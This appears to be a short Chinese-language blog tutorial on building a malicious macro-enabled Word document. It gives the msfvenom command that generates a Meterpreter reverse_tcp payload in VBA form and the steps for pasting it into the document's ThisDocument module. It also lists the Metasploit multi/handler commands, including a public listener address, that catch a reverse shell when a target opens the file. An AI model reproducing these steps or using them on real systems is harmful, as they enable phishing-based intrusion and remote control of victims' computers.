首先我们利用msf生成vbs
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba
设置word
新建一个word文档,文件另存为启用宏的word
文档
然后开发工具
——visual Basic
选择我们的项目ThisDocument
双击打开,粘贴我们生成的shell。
保存完成后,配置msf。
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
当目标运行word文档后,在msf中便会得到反弹!
版权属于:逍遥子大表哥
本文链接:https://blog.bbskali.cn/1941.html
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
此处评论已关闭